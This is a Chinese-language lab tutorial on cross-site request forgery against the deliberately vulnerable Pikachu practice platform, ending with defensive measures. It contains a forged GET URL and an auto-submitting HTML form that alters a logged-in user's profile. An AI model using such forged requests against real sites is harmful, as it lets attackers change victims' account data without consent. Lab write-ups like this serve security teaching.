pikachu平台之csrf

概述

参考链接
CSRF 是 Cross Site Request Forgery 的 简称，中文名为跨域请求伪造，在CSRF的攻击场景中，攻击者会伪造一个请求（一般是一个链接），然后欺骗目标用户进行点击，用户一旦点击了这个请求，这个攻击也就完成了，所以CSRF攻击也被称为“one click”攻击。

场景例子

lucy想要在购物网站上修改购物地址，这个操作是lucy通过浏览器向后端发送了请求。这个请求里面包含了lucy的新有货地址，如果是通过GET提交的，那么会以URL传参的方式的方式将新的地址提交给后台，类似上图中的URL，相当于点了链接就能修改个人信息。
如果这时候攻击者想要修改lucy的信息怎么办？那么他需要取得lucy的账号，获得登录权限。这时候他可以将修改个人信息的请求伪造一下，构造类似下图中的URL，引诱lucy在登录状态下进行点击，这样攻击就成功了。

CSRF攻击需要条件

  ① 目标网站没有对修改个人信息修改的请求进行防CSRF处理，导致该请求容易被伪造
因此，判断一个网站有没有CSRF漏洞，其实就是判断对关键信息（密码等）的操作（增删改）是否容易被伪造
  ② lucy点击伪造的请求链接时有登录状态（已经登陆了目标网站），如果lucy没有登录，那么即便lucy点击了链接也没有作用
从CSRF的利用条件来看，CSRF的利用难度会大一些，所以CSRF对应的安全级别低一些

CSRF和XSS的区别

 我们利用XSS可以达到盗取用户Cookie的目的，那么CSRF的区别在哪？

CSRF是借助用户的权限完成攻击，攻击者并没有拿到用户的权限。目标构造修改个人信息的链接，利用lucy在登录状态下点击此链接达到修改信息的目的。
XSS直接盗取了用户的权限，然后实施破坏。攻击者利用XSS盗取了目标的Cookie，登录lucy的后台，再修改相关信息。

如何确认一个目标站点是否有CSRF漏洞

   对目标站点增删改查的地方进行标记，并观察逻辑，判断请求是否可以伪造
1、比如修改管理员账号时，不需要验证旧密码
2、比如修改敏感信息不需要token验证
    确认凭证的有效期
1、虽然退出或关闭了览器，但Cookie仍然有效，或者Session没有及时过期，导致CSRF攻击变得简单

CSRF（get）

我们看一下Pikachu平台中CSRF（get）这个场景的使用，我们登录一下，账号有vince/allen/kobe/grady/kevin/lucy/lili，密码全部是123456

登录成功后可以来到个人中心，可以在这修改个人信息，进行登录，我们尝试修改一下个人信息并提交，同时利用BurpSuite抓包查看修改个人信息的请求内容，我们改一下地址。

提交。

可以看出已经被修改，反观整个修改是使用GET方法，没有做token，所以我们可以直接构造url修改用户信息。
构造如下，将china改为beijing.
127.0.0.1/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=18656565545&add=beijing&email=lili%40pikachu.com&submit=submi

攻击成功！

CSRF（post）

如果是POST型的，所有参数在请求体中提交，我们不能通过伪造URL的方式进行攻击。
我们登陆后，点击修改信息，将地址改为hacker，并用burp转包分析，如下。

这里的攻击类似于xss攻击方式，我们自己搭建攻击者服务器，这里为了方便，都用127.0.0.1来代替了。
修改/var/www/html/pikachu/doge_csrf/post.html，其他文件夹也可以。

<html>
<head>
<script>
window.onload = function() {
     
  document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://127.0.0.1/pikachu/vul/csrf/csrfpost/csrf_post_edit.php">
    <input id="sex" type="text" name="sex" value="girl" />
    <input id="phonenum" type="text" name="phonenum" value="12345678922" />
    <input id="add" type="text" name="add" value="hacker" />
    <input id="email" type="text" name="email" value="[email protected]" />
    <input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>

如果用户点击这个链接http://127.0.0.1/pikachu/doge_csrf/post.html。即可攻击成功。
攻击成功！

CSRF（token）

CSRF的主要问题是敏感操作容易被伪造，我们可以加入Token让请求不容易被伪造

每次请求，都增加一个随机码（需要够随机，不容易被伪造），后台每次对这个随机码进行验证， 我们进入Pikachu平台的CSRF（token）页面并登录，我们可以看一下这个GET请求

跟前面比较，这里多了一个Token，如果后台对提交的Token进行了验证，由于Token是随机的，我们就无法伪造URL了。

防护措施

1. 增加Token验证（常用做法）
   对关键操作增加Token参数，token必须随机，每次都不一样
2. 关于安全的会话管理（避免会话被利用）
   不要在客户端保存敏感信息（比如身份验证信息）
   退出、关闭浏览器时的会话过期机制
   设置会话过机制，比如15分钟无操作，则自动登录超时
3. 访问控制安全管理
   敏感信息的修改时需要身份进行二次认证，比如修改账号密码，需要判断旧密码
   敏感信息的修改使用POST，而不是GET
   通过HTTP头部中的REFERER来限制原页面
4. 增加验证码
   一般在登录（防暴力破解），也可以用在其他重要信息操作的表单中（需要考虑可用性）